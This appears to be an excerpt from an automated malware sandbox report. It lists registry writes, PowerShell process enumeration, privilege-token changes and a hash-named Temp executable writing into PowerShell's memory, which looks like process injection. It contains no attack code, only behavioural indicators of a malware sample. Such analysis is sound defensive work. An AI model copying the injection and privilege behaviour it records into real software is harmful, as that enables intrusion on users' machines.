00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff82ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff83ae2078e323294282c1e41cb67d5b9c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 N/A N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\client.cbs\Total = "0" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "0" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total\ = "0" N/A N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\client.cbs\NumberOfSubdomains = "0" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoftwindows.client.cbs\ = "2986" N/A N/A
Key created \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff N/A N/A
Key deleted \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com N/A N/A
Key deleted \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total N/A N/A
Key created \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell N/A N/A
Key created \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\client.cbs\ = "0" N/A N/A
Key created \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage N/A N/A
Key created \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\client.cbs\NumberOfSubdomains = "0" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\client.cbs\ = "0" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoftwindows.client.cbs\ = "0" N/A N/A
Key created \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU N/A N/A
Key created \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\MuiCache N/A N/A
Key created \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\bing.com N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\client.cbs\Total = "3095" N/A N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1696768468-2170909707-4198977321-1000\{5BF1EC3C-BE4D-40E6-A7B2-F6CC9537EAC7} N/A N/A
Key created \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DomStorageState N/A N/A
Key created \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\www.bing.com N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "13217" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "13184" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "13184" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "2986" N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.PeopleExperienceHost_cw5n1h2txyewy\ApplicationFrame\Microsoft.Windows.PeopleExperienceHo = 6801000088020000 N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "13184" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\client.cbs\NumberOfSubdomains = "1" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\client.cbs\Total = "0" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "13217" N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "133586183531326085" N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\PastIconsStream = 1400000005000000010001000200000014000000494c2006020004002c0010001000ffffffff2110ffffffffffffffff424d360000000000000036000000280000001000000040000000010020000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000ff00000060000000000000000000000020000000b0000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff00000060000000200000000000000020000000f00d0d0df09d9d9dffc8c8c8ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ff8f8f8fff000000ff000000603f3f3f66000000ff00000060000000900a0a0af0c0c0c0ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ff8f8f8fff000000ff0000006056565660e2e2e2ff474747eb000000d0000000e04c4c4cee999999ff939393eeb1b1b1f0e0e0e0ffe5e5e5ffe5e5e5ff8f8f8fff000000ff0000006056565660c8c8c8f7adadadf6858585ff000000ff000000ff737373ff999999ff999999ff999999ff999999ffa0a0a0e8868686ff000000ff000000606d6d6d88aaaaaaebb2b2b2ffb2b2b2ff7a7a7aff000000ff000000ff696969ff999999ff999999ff999999ff999999ff5f5f5fff000000ff0000006045454571b2b2b2ffb2b2b2ffb2b2b2ffa7a7a7ff1b1b1be8000000c0000000b0080808f08f8f8fff999999ff999999ff5f5f5fff000000ff00000060303030607f7f7fff7b7b7bf67e7e7ee2525252e20a0a0af0000000f00000003000000020000000f0101010eb5a5a5af6505050ff000000ff00000060303030607f7f7fff7f7f7fff7f7f7fff676767ff000000ff000000b000000020000000000000000000000020000000b0000000ff000000ff00000060303030607f7f7fff7f7f7fff7f7f7fff777777ff080808f0000000d0000000000000000000000000000000000000000000000060000000ff00000060000000602c2c2ceb5f5f5fff5f5f5fff3f3f3fee080808f0000000f0000000300000000000000000000000000000000000000000000000a0000000600000000000000050000000b0000000f0000000ff000000f0000000a000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000ff00000060000000000000000000000020000000b0000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff00000060000000200000000000000020000000f00d0d0df09d9d9dffc8c8c8ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ff8f8f8fff000000ff000000603f3f3f66000000ff00000060000000900a0a0af0c0c0c0ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ff8f8f8fff000000ff0000006056565660e2e2e2ff474747eb000000d0000000e04c4c4cee999999ff939393eeb1b1b1f0e0e0e0ffe5e5e5ffe5e5e5ff8f8f8fff000000ff0000006056565660c8c8c8f7adadadf6858585ff000000ff000000ff737373ff999999ff999999ff999999ff999999ffa0a0a0e8868686ff000000ff000000606d6d6d88aaaaaaebb2b2b2ffb2b2b2ff7a7a7aff000000ff000000ff696969ff999999ff999999ff999999ff999999ff5f5f5fff000000ff0000006045454571b2b2b2ffb2b2b2ffb2b2b2ffa7a7a7ff1b1b1be8000000c0000000b0080808f08f8f8fff999999ff999999ff5f5f5fff000000ff00000060303030607f7f7fff7b7b7bf67e7e7ee2525252e20a0a0af0000000f00000003000000020000000f0101010eb5a5a5af6505050ff000000ff00000060303030607f7f7fff7f7f7fff7f7f7fff676767ff000000ff000000b000000020000000000000000000000020000000b0000000ff000000ff00000060303030607f7f7fff7f7f7fff7f7f7fff777777ff080808f0000000d0000000000000000000000000000000000000000000000060000000ff00000060000000602c2c2ceb5f5f5fff5f5f5fff3f3f3fee080808f0000000f0000000300000000000000000000000000000000000000000000000a0000000600000000000000050000000b0000000f0000000ff000000f0000000a000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000424d3e000000000000003e0000002800000010000000400000000100010000000000000100000000000000000000000000000000000000000000ffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffff0000fff90000fff10000800100000000000000000000000000000000000000000000000000000001000080070000c0070000c80f0000ffff0000ffff0000ffff0000fff90000fff10000800100000000000000000000000000000000000000000000000000000001000080070000c0070000c80f0000ffff0000ffff000000000000000000000000000000000000000000000000010000000800000002000000040000002400000001000000000000000100000000000000 N/A N/A
Key deleted \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total N/A N/A
Key created \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\client.cbs N/A N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoftwindows.client.cbs\ = "23" N/A N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots N/A N/A
Key created \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3096 wrote to memory of 3176 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3096 wrote to memory of 3176 N/A C:\Users\Admin\AppData\Local\Temp\fee80e6e9a9e4efba1745eaf9037e3c88c75e6fdd24edc7450fc6cab9909fe3c.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
